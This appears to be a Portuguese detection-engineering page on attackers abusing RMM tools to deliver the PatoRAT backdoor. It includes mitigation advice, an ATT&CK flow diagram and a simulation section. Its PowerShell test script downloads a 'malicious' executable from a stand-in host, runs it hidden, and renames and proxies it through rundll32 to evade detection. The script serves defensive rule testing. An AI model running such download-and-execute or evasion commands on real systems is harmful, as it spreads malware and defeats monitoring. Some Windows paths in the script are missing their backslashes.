Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os cibercriminosos estão cada vez mais abusando de ferramentas legítimas de Gerenciamento e Monitoramento Remoto (RMM) — como LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne e SuperOps — para distribuir malware e estabelecer acesso remoto persistente. A entrega inicial geralmente ocorre por meio de páginas de download maliciosas ou e-mails de phishing, seguida pela execução do PowerShell e implantação de cargas secundárias, como o PatoRAT. AhnLab EDR pode detectar a execução dessas utilidades RMM e gerar alertas baseados em comportamento em torno de atividades suspeitas subsequentes. O relatório enfatiza a importância de validar a proveniência do software e manter a monitoração contínua dos endpoints.
Investigação
O AhnLab Security Intelligence Center observou várias campanhas nas quais os atacantes reformularam ou disfarçaram instaladores RMM como aplicativos populares (por exemplo, Notepad++, 7-Zip e Telegram) e os entregaram via sites maliciosos ou anexos de phishing. Após a instalação, os agentes RMM se registraram na infraestrutura do fornecedor e foram então usados para executar cargas de PowerShell que implantavam o PatoRAT. Técnicas similares apareceram em diversos produtos RMM, incluindo Syncro, entregue por meio de phishing com iscas de PDF. A lógica de detecção do AhnLab EDR foi desenvolvida para sinalizar a execução desses binários legítimos e correlacioná-los com comportamentos pós-instalação.
Mitigação
Verifique as fontes de download, valide os certificados de assinatura de código e compare os hashes com as versões oficiais do fornecedor antes de permitir o software RMM no ambiente. Implemente uma lista de permissões de aplicativos e exija aprovações explícitas para a execução de RMM. Monitore lançamentos inesperados de binários RMM, atividades anômalas de PowerShell e conexões suspeitas com domínios de infraestruturas de fornecedores quando tais ferramentas não forem sancionadas. Mantenha os sistemas operacionais e ferramentas de segurança atualizadas para reduzir a exposição.
Resposta
Quando uma execução suspeita de RMM for detectada, isole o host, colete artefatos forenses e remova o binário não autorizado. Bloqueie conexões de saída para a infraestrutura da ferramenta para cortar canais de controle remoto e realize uma varredura completa para cargas secundárias como o PatoRAT. Atualize o conteúdo de detecção com os IOCs observados e informe o SOC sobre os padrões da campanha para um triagem mais rápida.
“graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[“<b>Ação</b> – <b>T1204 Execução pelo Usuário</b>: As vítimas baixam instaladores RMM disfarçados como software legítimo ou abrem faturas de PDF de phishing que redirecionam para links maliciosos.”] class node_initial_access action node_masquerading[“<b>Técnica</b> – <b>T1036.008 Disfarce</b>: Instaladores e PDFs são forjados para parecer utilitários ou documentos confiáveis.”] class node_masquerading technique node_rmt_install[“<b>Ferramenta</b> – <b>Nome</b>: Ferramentas de Acesso Remoto como LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps.”] class node_rmt_install tool node_powerShell[“<b>Técnica</b> – <b>T1059.001 PowerShell</b>: O invasor executa comandos PowerShell via a plataforma RMM para baixar e instalar o backdoor PatoRAT.”] class node_powerShell technique node_patoRAT[“<b>Malware</b> – <b>Nome</b>: Backdoor PatoRAT.”] class node_patoRAT malware node_software_deployment[“<b>Técnica</b> – <b>T1072 Ferramentas de Implantação de Software</b>: As soluções RMM são utilizadas para enviar cargas maliciosas adicionais e manter a persistência.”] class node_software_deployment technique node_lateral_exploit[“<b>Técnica</b> – <b>T1210 Exploração de Serviços Remotos</b>: Ferramentas RMM comprometidas são usadas para abrir sessões remotas e se mover lateralmente pelo ambiente.”] class node_lateral_exploit technique node_rdp_hijack[“<b>Técnica</b> – <b>T1563.002 Sequestro de Sessão de Serviço Remoto</b>: O sequestro de RDP é realizado para obter o controle de hosts adicionais.”] class node_rdp_hijack technique node_root_cert[“<b>Técnica</b> – <b>T1553.004 Instalação de Certificado Raiz</b>: Comandos PowerShell instalam um certificado raiz malicioso para escapar dos controles de segurança.”] class node_root_cert technique %% Connections node_initial_access u002du002d>|leva a| node_masquerading node_masquerading u002du002d>|leva a| node_rmt_install node_rmt_install u002du002d>|usa| node_powerShell node_powerShell u002du002d>|instala| node_patoRAT node_patoRAT u002du002d>|habilita| node_software_deployment node_software_deployment u002du002d>|facilita| node_lateral_exploit node_lateral_exploit u002du002d>|habilita| node_rdp_hijack node_powerShell u002du002d>|executa| node_root_cert “
Fluxo de Ataque
Detecções
Software Alternativo de Acesso/ Gestão Remota (via criação de processo)
Ver
Possível Tentativa de Instalação do Software SuperOps RMM (via evento de arquivo)
Ver
Software Alternativo de Acesso/ Gestão Remota (via auditoria)
Ver
Software Alternativo de Acesso/ Gestão Remota (via sistema)
Ver
Detecção da Exploração de Ferramenta RMM para Distribuição de Malware [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Telemetria e Base Linha Pré-voo deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a exata telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque & Comandos:
Um atacante entrega um e-mail de phishing contendo um anexo malicioso. O anexo executa um script do PowerShell que baixa o binário RMMLogMeIn.exetoC:Temp. Para evadir a detecção baseada em nome, o atacante renomeia o binário paratool.exee o lança viarundll32.exe(T1216). O binário RMM então contata o servidor C2 controlado pelo atacante e solta uma carga de backdoor. Após a execução, o atacante apaga o binário (T1542.004) para cobrir os rastros. -
Script de Teste de Regressão:
# --------------------------------------------------------------- # Simular exploração de ferramenta RMM (nome original) – deve acionar # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Executando binário RMM original (esperado alerta)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simular evasão renomeando e execução por proxy – NÃO deve acionar # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Executando binário RMM renomeado via rundll32 (evasão)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Limpeza de artefatos # --------------------------------------------------------------- Write-Host "[*] Limpando binários..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulação completa." -
Comandos de Limpeza:
# Assegure que quaisquer processos remanescentes sejam terminados Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Remova quaisquer arquivos baixados (se ainda existirem) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue